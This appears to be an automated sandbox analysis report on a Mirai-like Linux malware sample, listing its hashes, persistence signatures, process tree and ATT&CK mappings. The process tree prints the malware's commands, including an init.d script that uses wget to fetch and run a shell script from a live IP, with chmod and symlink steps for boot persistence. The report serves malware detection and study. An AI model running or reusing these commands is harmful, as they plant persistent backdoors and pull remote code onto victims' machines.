Analysis
max time kernel: 2s
max time network: 179s
platform: ubuntu-20.04_amd64
resource: ubuntu2004-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu2004-amd64-20240611-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
submitted: 22/11/2024, 12:08
Static task: static1
Behavioral task: behavioral1
Sample: 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5
Resource: ubuntu2004-amd64-20240611-en
General
Target: 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5
Size: 90KB
MD5: 563205e6c072588081ca841fc18d9f71
SHA1: 1f7509a4c3456b8d29d504852648efface0e60cf
SHA256: 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5
SHA512: e55bbe2f62f898a1ee483fbed038de6d987c1cbac6688b3d12bf0a4f36a3d503abf474df82495d6b3e0c4ce60b01869bc497855879b6012c2cda9afba93b55f8
SSDEEP: 1536:0loZZa3wD/CqhX9tLPGcMXNPsVzqbvGxHyAG/jZaZSibj7l3i2XE51SRhtQR/ad:0lEkwD/Cq9XOW+bvGy9csEjh3zUyh2ad
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 5 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid | Process
1464 | sh
1465 | chmod
1468 | sh
1469 | sh
1470 | chmod

Modifies Watchdog functionality (1 TTPs, 2 IoCs)
Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.
description | ioc | Process
File opened for modification | /dev/misc/watchdog | 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5
File opened for modification | /dev/watchdog | 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5

Reads EFI boot settings (1 TTPs, 1 IoCs)
Reads EFI boot settings from the efivars filesystem, which may contain security secrets or sensitive data.
description | ioc | Process
File opened for reading | /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 | systemctl

Creates/modifies environment variables (1 TTPs, 1 IoCs)
Creating/modifying environment variables is a common persistence mechanism.
description | ioc | Process
File opened for modification | /etc/profile | 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5

Modifies init.d
description | ioc | Process
File opened for modification | /etc/init.d/mybinary | 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5
File opened for modification | /etc/init.d/sh | sh

Modifies rc script (2 TTPs, 1 IoCs)
Adding/modifying system rc scripts is a common persistence mechanism.
description | ioc | Process
File opened for modification | /etc/rc.local | 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5

Modifies systemd (2 TTPs, 1 IoCs)
Adds/modifies systemd service files, likely to achieve persistence.
description | ioc | Process
File opened for modification | /etc/systemd/system/custom.service | 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5

Modifies Bash startup script (2 TTPs, 1 IoCs)
description | ioc | Process
File opened for modification | /etc/profile | 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5

Changes its process name (1 IoCs)
description | ioc | pid | Process
Changes the process name, possibly in an attempt to hide itself | /var/iamnewgorilla | 1396 | 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5

Reads runtime system information
description | ioc | Process
File opened for reading | /proc/self/status | 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5
File opened for reading | /proc/1/cgroup | 5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5
File opened for reading | /proc/self/stat | systemctl
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/filesystems | mkdir
File opened for reading | /proc/filesystems | systemctl
File opened for reading | /proc/sys/kernel/osrelease | systemctl
File opened for reading | /proc/1/environ | systemctl
File opened for reading | /proc/cmdline | systemctl
Processes
/tmp/5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5 (PID 1396)
    command: /tmp/5b56bb90601a55fb49bea46f524a47570b4a0a9117bd7d545f406a78d2f3f2c5
    signatures: Modifies Watchdog functionality; Creates/modifies environment variables; Modifies init.d; Modifies rc script; Modifies systemd; Modifies Bash startup script; Changes its process name; Reads runtime system information
    /bin/sh (PID 1402)
        command: sh -c "systemctl enable custom.service >/dev/null 2>&1"
        /usr/bin/systemctl (PID 1404)
            command: systemctl enable custom.service
            signatures: Reads EFI boot settings; Reads runtime system information
    /bin/sh (PID 1464)
        command: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
        signatures: File and Directory Permissions Modification
        /usr/bin/chmod (PID 1465)
            command: chmod +x /etc/init.d/mybinary
            signatures: File and Directory Permissions Modification
    /bin/sh (PID 1466)
        command: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
        /usr/bin/ln (PID 1467)
            command: ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
    /bin/sh (PID 1468)
        command: sh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://87.120.84.247/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"
        signatures: File and Directory Permissions Modification; Modifies init.d
    /bin/sh (PID 1469)
        command: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
        signatures: File and Directory Permissions Modification
        /usr/bin/chmod (PID 1470)
            command: chmod +x /etc/init.d/sh
            signatures: File and Directory Permissions Modification
    /bin/sh (PID 1471)
        command: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
        /usr/bin/mkdir (PID 1472)
            command: mkdir -p /etc/rc.d
            signatures: Reads runtime system information
    /bin/sh (PID 1473)
        command: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
        /usr/bin/ln (PID 1474)
            command: ln -s /etc/init.d/sh /etc/rc.d/S99sh
Network
MITRE ATT&CK Enterprise v15
Persistence
    Boot or Logon Autostart Execution (4)
        XDG Autostart Entries (1)
    Boot or Logon Initialization Scripts (2)
        RC Scripts (2)
    Create or Modify System Process (1)
        Systemd Service (1)
    Event Triggered Execution (1)
        Unix Shell Configuration Modification (1)
    Hijack Execution Flow (1)
        Path Interception by PATH Environment Variable (1)
    Pre-OS Boot (1)
        Bootkit (1)
Privilege Escalation
    Boot or Logon Autostart Execution (4)
        XDG Autostart Entries (1)
    Boot or Logon Initialization Scripts (2)
        RC Scripts (2)
    Create or Modify System Process (1)
        Systemd Service (1)
    Event Triggered Execution (1)
        Unix Shell Configuration Modification (1)
    Hijack Execution Flow (1)
        Path Interception by PATH Environment Variable (1)
Downloads